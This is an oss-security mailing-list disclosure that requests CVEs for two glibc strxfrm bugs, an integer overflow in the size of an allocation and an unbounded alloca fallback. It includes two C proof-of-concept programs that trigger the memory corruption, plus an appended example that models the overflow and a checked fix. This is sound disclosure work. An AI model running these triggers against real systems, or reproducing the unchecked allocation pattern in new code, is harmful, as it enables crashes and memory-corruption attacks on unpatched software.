Date: Fri, 13 Feb 2015 12:17:25 +0000
From: mancha <mancha1@...o.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: CVE Requests - glibc overflows (strxfrm)

Hello.

1. Joseph Myers discovered strxfrm is vulnerable to integer overflows
when computing memory allocation sizes (similar to CVE-2012-4412), i.e.,
in string/strxfrm_l.c:

  idxarr = (int32_t *) malloc ((srclen + 1) * (sizeof (int32_t) + 1));

Attached strxfrm-int32.c should trigger on 32-bit machines.

2. Shaun Colley discovered strxfrm falls back to an unbounded alloca if
malloc fails, making it vulnerable to stack-based buffer overflows
(similar to CVE-2012-4424) [1]. Attached strxfrm-alloca.c should
trigger.


Both issues were fixed in glibc 2.21 [2] and a quick check shows
vulnerable code appears to go back to at least glibc 2.3.

Please allocate CVEs for these issues. Many thanks.

--mancha

==============

[1] https://sourceware.org/bugzilla/show_bug.cgi?id=16009
[2] https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=0f9e585480ed

/* gcc -o strxfrm-alloca strxfrm-alloca.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

#define BUFLEN 512000

int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);
  char *avail = NULL;

  if (!src || !dst)
    return 1;

  memset(src, 'A', BUFLEN);
  src[BUFLEN] = '\0';               /* strxfrm needs a NUL-terminated source */
  setlocale(LC_ALL, "en_US.UTF-8");

  /* Exhaust the heap so the malloc inside strxfrm fails and the
     vulnerable code path falls back to an unbounded alloca. */
  do
    avail = malloc(BUFLEN);
  while (avail);

  size_t len = strxfrm(dst, src, BUFLEN);
  (void) len;
  return 0;
}

/* gcc -o strxfrm-int32 strxfrm-int32.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

/* (BUFLEN + 1) * (sizeof (int32_t) + 1) = 4294967300, which wraps to 4
   in a 32-bit size_t, so the index array is allocated far too small. */
#define BUFLEN 858993459

int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);

  if (!src || !dst)
    return 1;

  memset(src, 'A', BUFLEN);
  src[BUFLEN] = '\0';               /* strxfrm needs a NUL-terminated source */
  setlocale(LC_ALL, "en_US.UTF-8");

  size_t len = strxfrm(dst, src, BUFLEN);
  (void) len;
  return 0;
}
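An added example, not part of mancha's mail or of glibc itself, that models the first issue: the index-array size expression quoted from string/strxfrm_l.c evaluated in 32-bit arithmetic (so the wrap is reproducible on any host), beside an overflow-checked version a maintainer would want in its place. The function names idxarr_bytes_wrapped32 and idxarr_bytes_checked32 and the uint32_t model of a 32-bit size_t are assumptions of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <stdio.h>

/* Per-element size from the expression in the mail: sizeof (int32_t) + 1. */
#define IDXARR_ELEM ((uint32_t) (sizeof (int32_t) + 1))

/* The unchecked computation as the vulnerable code did it, evaluated in
   32-bit unsigned arithmetic to model size_t on a 32-bit machine
   (assumption of this example; the result wraps modulo 2^32). */
uint32_t idxarr_bytes_wrapped32(uint32_t srclen)
{
  return (uint32_t) ((srclen + 1u) * IDXARR_ELEM);
}

/* Overflow-checked version (hypothetical helper, not glibc's actual fix):
   returns false if (srclen + 1) * IDXARR_ELEM does not fit in 32 bits,
   otherwise stores the byte count in *out and returns true. */
bool idxarr_bytes_checked32(uint32_t srclen, uint32_t *out)
{
  if (srclen == UINT32_MAX)                 /* srclen + 1 would wrap */
    return false;
  uint32_t n = srclen + 1u;
  if (n > UINT32_MAX / IDXARR_ELEM)         /* n * IDXARR_ELEM would wrap */
    return false;
  *out = n * IDXARR_ELEM;
  return true;
}

int main(void)
{
  /* Constructed inputs: the mail's two BUFLEN values plus the largest
     length that still fits. */
  uint32_t lens[] = { 512000u, 858993458u, 858993459u };
  for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
    uint32_t bytes = 0;
    bool fits = idxarr_bytes_checked32(lens[i], &bytes);
    printf("srclen=%u wrapped=%u checked=%s\n", lens[i],
           idxarr_bytes_wrapped32(lens[i]), fits ? "fits" : "overflow");
  }
  return 0;
}
```

With srclen = 858993459 the wrapped computation yields 4 bytes, which is why that value was chosen for strxfrm-int32.c; the checked version rejects it.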

